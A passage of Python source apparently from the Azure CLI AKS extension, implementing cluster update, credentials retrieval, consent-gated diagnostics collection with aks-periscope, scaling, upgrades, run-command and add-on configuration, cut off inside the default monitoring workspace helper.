instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise CLIError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
            msg = ('Your cluster is using a service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
if not _is_pod_identity_addon_enabled(instance):
# we only rebuild the pod identity profile if it's disabled before
_update_addon_pod_identity(
instance, enable=True,
allow_kubenet_consent=enable_pod_identity_with_kubenet,
)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
azure_keyvault_secrets_provider_addon_profile = None
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
azure_keyvault_secrets_provider_addon_profile = instance.addon_profiles.get(CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, None)
azure_keyvault_secrets_provider_enabled = CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME].enabled
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled
if enable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--enable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--disable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if tags:
instance.tags = tags
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
headers = get_aks_custom_headers(aks_custom_headers)
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
    print('If you share access to that storage account with Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
    print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the nodepool name or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node image version, please use the "--node-image-only" option.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This only provides convenience for customers at the client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only supports upgrading a single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. A node image only upgrade '
                               'can only be applied to a VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance, custom_headers=headers)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise CLIError('Command cannot be empty.')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.run_command(
resource_group_name, name, request_payload, long_running_operation_timeout=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise CLIError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
    # cli_ctx.data['safe_params'] contains the list of parameter names the user typed in, without values.
    # The CLI core also uses this to calculate the ParameterSetName header for all HTTP requests from the CLI.
if cli_ctx.data['safe_params'] is None or "-o" in cli_ctx.data['safe_params'] or "--output" in cli_ctx.data['safe_params']:
# user specified output format, honor their choice, return object to render pipeline
return commandResult
else:
# user didn't specify any format, so we can customize the print for the best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, finished at {commandResult.finished_at}, with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
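# _get_command_context packages the attached files (or the whole current folder when "." is given)
# into an in-memory zip archive and returns it base64-encoded, which is what the run-command
# request payload expects for its context field.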
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# "." means attach the current folder; it cannot be combined with other files (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise CLIError(
". is used to attach the current folder and cannot be combined with other attachments.")
if os.path.isfile(file):
# for individually attached files, flatten them into the same folder
filesToAttach[file] = os.path.basename(file)
else:
raise CLIError(f"{file} is not a valid file, or is not accessible.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir()  # uncomment to debug the archive contents
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
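# _get_dataplane_aad_token fetches a raw AAD access token for the given server application id using
# the current CLI profile; expired credentials (AADSTS70008) surface as a prompt to re-run "az login".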
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons or 'azure-defender' in addons:
if not workspace_resource_id:
# use the default workspace if it exists, otherwise create one
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
if 'monitoring' in addons:
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
if 'azure-defender' in addons:
addon_profiles[CONST_AZURE_DEFENDER_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('azure-defender')
# error out if '--enable-addons=monitoring/azure-defender' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons [monitoring/azure-defender]".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
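# When monitoring (or azure-defender) is enabled without an explicit workspace, the helper below
# maps the cluster's resource group location to a Log Analytics region and falls back to a default
# workspace named DefaultWorkspace-<subscription>-<regionCode> in DefaultResourceGroup-<regionCode>,
# creating both if they do not already exist. For illustration only (actual names depend on your
# subscription and region): a resource group in westus2 maps to code WUS2 and would use
# /subscriptions/<sub>/resourceGroups/DefaultResourceGroup-WUS2/providers/Microsoft.OperationalInsights/workspaces/DefaultWorkspace-<sub>-WUS2.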
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# log analytics only supports the China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
logger.error(
"AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.cli.core.profiles import ResourceType
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except HttpResponseError as ex:
if ex.status_code != 404:
raise ex
else:
